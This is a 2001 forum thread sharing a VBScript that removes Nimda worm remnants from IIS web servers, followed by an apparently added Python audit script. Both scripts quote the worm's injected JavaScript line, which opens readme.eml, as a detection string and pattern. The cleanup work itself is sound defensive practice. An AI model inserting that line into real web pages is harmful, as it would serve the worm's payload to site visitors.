
Free Nimda worm cleaner for IIS

  • 19-09-2001 4:37pm
    #1
    Closed Accounts Posts: 74 ✭✭


    Hi,

    We have written a vbs script file that can be used to help clear Nimda from an infected IIS web server. It goes through all web site folders and removes the javascript inserted by Nimda in HTML & ASP files. Also deletes readme.eml wherever it finds it.

    Handy if your server has lots of sites / files on it.

    Anybody who wants it can contact me directly.

    It's free!


Comments

  • Registered Users, Registered Users 2 Posts: 16,414 ✭✭✭✭Trojan


    Can you link or paste the source here for us?

    That would be handy... otherwise people will probably go to the AV centres to get disinfectors.

    Al.


  • Closed Accounts Posts: 74 ✭✭Anemone


    Here's the source code. It's quick & dirty. I know it works though, cos we used it to clean a server with lots of sites on it. Use it entirely at your own risk etc. etc. Save it with a .vbs extension and double-click to run. It will ask what folder to run from. You may have to fix any line wrapping that Boards does.

    'START COPYING HERE

    '************************************
    'Nimda worm cleaner for IIS web servers
    '************************************
    'Starting at the specified root folder
    'this script builds a list of all files in
    'the tree below that root folder.
    'It then deletes any files in the list
    'that are called readme.eml.
    'It removes the Nimda javascript line
    'from any files with an asp or htm extension.
    'Results are reported at the end.

    '*****************************************************
    'WARNING: THIS SCRIPT MODIFIES AND / OR DELETES FILES.
    'USE AT YOUR OWN RISK ONLY.
    'AUTHOR ACCEPTS NO RESPONSIBILITY
    'FOR LOSS OR DAMAGE CAUSED BY THIS SCRIPT
    '*****************************************************


    '***************************
    'GET A LIST OF ALL THE FILES INTO AN ARRAY
    '***************************

    'Ignore errors (in case of locked files or permission problems)
    on error resume next

    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")

    strPath = InputBox ("Enter the Root Folder to start on","Root Folder" )

    Dim rootFolder
    Set rootFolder = fso.GetFolder(strPath)

    ReDim FileList(1)

    Call AddFolders(rootFolder)

    '***************************
    'EDIT THE FILES AS NECESSARY
    '**************************
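    varEdit = 0
    varDel = 0

    'The exact line Nimda appends to web pages
    WormText = "<html><script language=""JavaScript"">window.open(""readme.eml"", null, ""resizable=no,top=6000,left=6000"")</script></html>"

    Dim stream
    for x = 0 to ubound(FileList)

        if len(trim(FileList(x))) > 0 then

            'Compare names in lower case so README.EML, .HTM and .ASP also match
            strName = lcase(fso.GetFileName(FileList(x)))
            strExt = lcase(fso.GetExtensionName(FileList(x)))

            'Delete the file if it is readme.eml
            if strName = "readme.eml" then
                Err.Clear
                fso.DeleteFile FileList(x), True

                'Only count files that were actually deleted
                if Err.Number = 0 then varDel = varDel + 1

            'If it's a htm or asp take the worm javascript out of it
            elseif strExt = "htm" or strExt = "asp" then

                'Reset first: a failed read (locked or empty file) must not
                'leave the previous file's contents in the variable
                strFileContents = ""
                Err.Clear
                Set stream = fso.OpenTextFile(FileList(x))
                strFileContents = stream.ReadAll
                stream.close
                set stream = nothing

                'Write the file back out, overwriting the original, only if it
                'was read without error and actually contains the worm line
                if Err.Number = 0 and InStr(1, strFileContents, WormText, 1) > 0 then
                    strFileContents = Replace(strFileContents, WormText, "", 1, -1, 1)
                    Call MakeFile(FileList(x), strFileContents)
                    varEdit = varEdit + 1
                end if

            end if
        end if
    next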


    '**********
    'FINISHED
    '**********
    MsgBox "Files Deleted: " & varDel & vbCrLf & "Files Cleaned: " & varEdit, 0, "Finished"
    wscript.quit


    sub AddFolders(objFolder)

        dim files
        set files = objFolder.Files

        For Each file in files
            strFullPath = file.Path
            LastItem = ubound(FileList)
            FileList(LastItem) = strFullPath
            ReDim Preserve FileList(LastItem + 1)
        Next
        set files = nothing

        Dim subFolders
        Set subFolders = objFolder.SubFolders

        For Each folder in subFolders
            Call AddFolders(folder)
        Next
        set subFolders = nothing

    end sub

    sub MakeFile(NameOfFile, FileContents)

        Dim objFSO2, objFile2
        Set objFSO2 = CreateObject("Scripting.FileSystemObject")

        Set objFile2 = objFSO2.CreateTextFile(NameOfFile,True)
        objFile2.Write FileContents

        objFile2.Close
        Set objFile2 = Nothing
        Set objFSO2 = Nothing
    end sub

    'STOP COPYING HERE


  • Closed Accounts Posts: 74 ✭✭Anemone


    I forgot to mention when posting the source code that there is no point in using the script unless the executables infected with Nimda code, registry changes made by Nimda etc. have been fixed beforehand, because Nimda will just reinfect the files again after you run the script.

    The main reason we wrote this script was to help clean up web sites after the active part of the Nimda infection has been removed.
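
A read-only check to run before and after the cleanup above, added here as an example and not part of the thread or the poster's script: it walks a web root and lists pages that still carry the injected line, any readme.eml files, and files it could not read, without modifying anything. Assumptions: the function names, the looser whitespace-tolerant pattern, the inclusion of .html alongside the thread's htm/asp, and the constructed sample tree in `demo()`.

```python
import os
import re
import tempfile

# The line the thread's script removes, matched on raw bytes and ignoring case
# and whitespace differences, so no file is decoded or rewritten by the audit.
WORM_RE = re.compile(
    rb'<html>\s*<script\s+language="JavaScript">\s*window\.open\("readme\.eml"'
    rb'[^<]*</script>\s*</html>', re.IGNORECASE)
PAGE_EXTS = {".htm", ".html", ".asp"}  # assumption: .html added to the thread's htm/asp


def audit(root):
    """Return (pages_with_worm_line, readme_eml_files, unreadable) under root."""
    infected, droppers, unreadable = [], [], []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            if name.lower() == "readme.eml":
                droppers.append(path)
                continue
            if os.path.splitext(name)[1].lower() not in PAGE_EXTS:
                continue
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                unreadable.append(path)  # locked or no permission: report, don't hide
                continue
            if WORM_RE.search(data):
                infected.append(path)
    return sorted(infected), sorted(droppers), sorted(unreadable)


def demo():
    """Build a small constructed web root and audit it."""
    worm = (b'<html><script language="JavaScript">window.open("readme.eml", null, '
            b'"resizable=no,top=6000,left=6000")</script></html>')
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "site1", "img"))
        samples = {"site1/INDEX.HTM": b"<html><body>hi</body></html>\r\n" + worm,
                   "site1/clean.asp": b"<% Response.Write 1 %>",
                   "site1/empty.htm": b"",
                   "site1/img/README.EML": b"constructed placeholder"}
        for rel, body in samples.items():
            with open(os.path.join(root, *rel.split("/")), "wb") as fh:
                fh.write(body)
        inf, drop, bad = audit(root)
        return ([os.path.relpath(p, root) for p in inf],
                [os.path.relpath(p, root) for p in drop], bad)
```

An empty result from `audit()` on a later run, with the unreadable list also empty, is the signal that the pages stayed clean after the active infection was removed.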


  • Registered Users, Registered Users 2 Posts: 5,335 ✭✭✭Cake Fiend


    There's a link to a removal tool on www.symantec.com

